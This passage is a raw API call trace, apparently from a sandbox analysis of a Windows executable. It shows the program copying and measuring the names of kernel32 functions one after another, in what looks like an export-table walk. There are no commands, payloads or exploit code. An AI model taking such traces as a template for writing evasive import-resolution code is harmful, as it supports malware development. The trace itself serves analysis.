[0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.081] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.081] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.081] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.081] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.081] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.081] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.081] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.081] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.081] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.081] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.081] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.081] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.081] lstrlenA (lpString="COPYFILEA") returned 9 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.081] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.081] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.082] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.082] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.082] lstrlenA (lpString="COPYFILEW") returned 9 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.082] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.082] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.082] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.082] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.082] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.082] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.082] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.082] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.082] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.082] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.082] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.082] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.082] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.082] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.082] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.082] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.083] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.083] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.083] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.083] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.083] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.083] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.083] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.083] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.083] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.083] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.083] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.083] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.083] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.083] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.083] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.083] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.083] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.083] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.083] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.083] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.084] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.084] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.084] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.084] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.084] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.084] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.084] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.084] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.084] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.084] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.084] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.084] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.084] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.084] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.084] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.084] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.084] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.084] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.084] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.084] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.085] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.085] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.085] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.085] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.085] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.085] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.085] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.085] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.085] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.085] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.085] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.085] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.085] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.085] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.085] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.085] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.085] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.085] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.085] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.086] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.086] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.086] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.086] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.086] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.086] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.086] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.086] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.086] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.086] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.086] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.086] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.086] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.086] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.086] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.086] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.086] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.086] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.086] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.086] lstrlenA (lpString="DELETEATOM") returned 10 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.087] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.087] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.087] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.087] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.087] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.087] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.087] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.087] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.087] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.087] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.087] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.087] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.087] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.087] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.087] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.087] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.087] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.087] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.087] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.088] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.088] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.088] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.088] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: 